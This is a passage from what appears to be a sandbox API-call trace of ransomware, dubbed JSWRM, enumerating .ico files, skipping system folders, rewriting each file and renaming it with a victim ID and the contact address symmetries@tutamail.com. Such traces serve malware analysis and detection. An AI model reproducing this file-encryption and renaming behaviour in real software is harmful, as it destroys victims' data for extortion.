lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Print.ico", lpUsedDefaultChar=0x0) returned 9 [0060.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Print.ico", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Print.ico", cchWideChar=9, lpMultiByteStr=0x345f5e0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Print.ico", lpUsedDefaultChar=0x0) returned 9 [0060.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0060.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.406] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.406] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.406] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0060.414] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.414] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=1150) returned 1 [0060.414] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.415] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x470) returned 0x203550 [0060.415] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x470, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x470, lpOverlapped=0x0) returned 1 [0060.424] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.424] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x470, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x470, lpOverlapped=0x0) returned 1 [0060.424] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.424] CloseHandle (hObject=0x3d4) returned 1 [0060.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ef0 [0060.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0060.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.425] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0060.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0060.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0060.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0060.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0060.426] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.426] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.426] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0060.427] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2=".") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="..") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="...") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="windows") returned -1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="recovery") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="perflogs") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="documents and settings") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="system volume information") returned -1 [0060.427] lstrcmpiW (lpString1="Rotate1.ico", lpString2="msocache") returned 1 [0060.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate1.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate1.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate1.ico", lpUsedDefaultChar=0x0) returned 11 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0060.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate1.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate1.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate1.ico", lpUsedDefaultChar=0x0) returned 11 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0060.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.427] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.427] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.427] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233230 [0060.427] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.428] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.428] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.428] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.428] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.482] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.482] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.482] CloseHandle (hObject=0x3d4) returned 1 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0060.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2331c8 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.483] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2331c8 | out: hHeap=0x1e0000) returned 1 [0060.483] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.484] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.484] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0060.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233230 | out: hHeap=0x1e0000) returned 1 [0060.485] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2=".") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="..") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="...") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="windows") returned -1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="recovery") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="perflogs") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="documents and settings") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="system volume information") returned -1 [0060.485] lstrcmpiW (lpString1="Rotate2.ico", lpString2="msocache") returned 1 [0060.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate2.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate2.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate2.ico", lpUsedDefaultChar=0x0) returned 11 [0060.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0060.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate2.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate2.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate2.ico", lpUsedDefaultChar=0x0) returned 11 [0060.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0060.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e88 [0060.485] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.485] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.485] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0060.485] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0060.486] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=894) returned 1 [0060.486] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.486] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x203550 [0060.486] ReadFile (in: hFile=0x3d4, lpBuffer=0x203550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345f2d4*=0x370, lpOverlapped=0x0) returned 1 [0060.487] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0060.487] WriteFile (in: hFile=0x3d4, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345f2d0*=0x370, lpOverlapped=0x0) returned 1 [0060.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0060.488] CloseHandle (hObject=0x3d4) returned 1 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0060.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0060.488] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0060.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0060.488] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0060.488] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0060.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0060.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0060.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0060.489] MoveFileW (lpExistingFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), lpNewFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0060.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0060.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233090 | out: hHeap=0x1e0000) returned 1 [0060.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0060.489] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0xfffffffe, dwReserved1=0x345f4c0, cFileName="Rotate3.ico", cAlternateFileName="")) returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2=".") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="..") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="...") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="windows") returned -1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="recovery") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="perflogs") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="documents and settings") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="$RECYCLE.BIN") returned 1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="system volume information") returned -1 [0060.489] lstrcmpiW (lpString1="Rotate3.ico", lpString2="msocache") returned 1 [0060.489] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate3.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate3.ico", cchWideChar=11, lpMultiByteStr=0x345f610, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate3.ico", lpUsedDefaultChar=0x0) returned 11 [0060.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0060.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate3.ico", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Rotate3.ico", cchWideChar=11, lpMultiByteStr=0x345f5e0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Rotate3.ico", lpUsedDefaultChar=0x0) returned 11 [0060.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0060.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0060.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0060.490] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0060.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233090 [0060.490] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: 